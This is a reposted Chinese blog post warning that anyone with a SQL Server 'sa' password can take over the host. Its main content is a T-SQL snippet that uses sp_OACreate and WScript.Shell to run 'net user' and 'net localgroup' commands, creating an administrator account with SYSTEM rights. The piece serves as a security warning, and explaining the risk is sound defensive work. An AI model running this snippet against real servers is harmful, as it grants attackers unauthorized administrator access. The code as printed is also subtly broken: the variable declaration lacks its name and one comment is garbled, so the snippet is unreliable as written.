SQL Server的安全隱患:不要以為黑掉的只是SQL SERVER而已。 (轉)
SERVER存在著非常嚴重的隱患。sa的密碼就像Administrator的密碼一樣重要。
假如別人獲得了超級sa的密碼,那麼他/她可以在查詢分析器裡使用下面的SQL語句輕易在(所在的Server)上建立一個超級使用者:
declare @ int
--建立WScript.
EXEC sp_OACreate 'WScript.Shell',@object OUT
--運 user iamer opendoor /add
--新增一個名字為iamhacker,密碼為opendoor的使用者
EXEC sp_OAMethod @object,'Run',NULL,'net user iamhacker opendoor /add'
--把iamhacker新增到Administrators組中
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Administrators iamhacker /add'
--把iamhacker從User組中刪除
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Users iamhacker /del'
我已經嘗試過了。。實在太恐怖了。
上面的語句很短。核心是能夠平臺命令 net 。
其實現方法是SQL SERVER呼叫Automation的強大功能。再配合WSH中的一個WScript.Shell的一個方法:Run。(注意,一般SQL SERVER都是在SYSTEM的下執行的。也就是說,Run所呼叫的也是具有SYSTEM的許可權。)
(相關的實驗是,呼叫一下NOTEPAD,那麼工作管理員下將有使用者為SYSTEM的NOTEPAD。EXE程式存在)
WScript.Shell的隱患其實已經在各個方面很顯著了。想不到現在竟然在Sql Server上也有相關的問題。
所以。大家一定要注意保管好sa的密碼。不要隨便被人黑了哦。。。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10752043/viewspace-996734/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- SQL SERVER 2008安全配置SQLServer
- DataGear 變更部署資料庫為SQL Server填坑指南(含轉寫後的SQL server程式碼及SQL server配置檔案)資料庫SQLServer
- SQL Server中提前找到隱式轉換提升效能的辦法SQLServer
- SQL Server資料庫安全SQLServer資料庫
- sql serverSQLServer
- SQL Server 2008中Analysis Services的新特性——深入SQL Server 2008SQLServer
- SQL Server 的死鎖SQLServer
- [轉帖]見識一下SQL Server隱式轉換處理的不同SQLServer
- 管理SQL Server資料庫安全SQLServer資料庫
- Moebius for SQL ServerSQLServer
- sql server 使用SQLServer
- SQL Server教程SQLServer
- SQL Server 2014的重建索引SQLServer索引
- Developer 帶有名為 SQL Server Compact 免費的 SQL 資料庫DeveloperSQLServer資料庫
- SQL Server資料庫中的資料型別隱式轉換問題SQLServer資料庫資料型別
- SQL Server安全審計中的常見疏忽NFSQLServer
- SQL Server 2008的故障轉移叢集概述UBSQLServer
- SQL Server Left joinSQLServer
- What is dbo in SQL Server?SQLServer
- Sql server with as update用法SQLServer
- SQL Server下載SQLServer
- SQL Server SUBSTRING FunctionsSQLServerFunction
- SQL Server Unique ConstratintsSQLServer
- SQL Server LEFT FunctionsSQLServerFunction
- ms sql server排序SQLServer排序
- SQL Server 替換SQLServer
- SQL SERVER優化SQLServer優化
- Nodejs 操作 Sql ServerNodeJSSQLServer
- SQL Server 別名(as)SQLServer
- sql server遞迴SQLServer遞迴
- SQL Server 中的 ACID 屬性SQLServer
- 開箱即用的 SQL Server DockerSQLServerDocker
- Windows 系統 SQL Server 配置使用安全模式WindowsSQLServer模式
- SQL Server安全設定最佳實踐SQSQLServer
- 審計SQL Server安全性的幾種方式YGSQLServer
- SQL Server資料庫恢復,SQL Server資料恢復,SQL Server資料誤刪除恢復工具SQLRescueSQLServer資料庫資料恢復
- sql server 2019安裝SQLServer
- High Availability (HA) in SQL ServerAISQLServer
- docker sql server安裝DockerSQLServer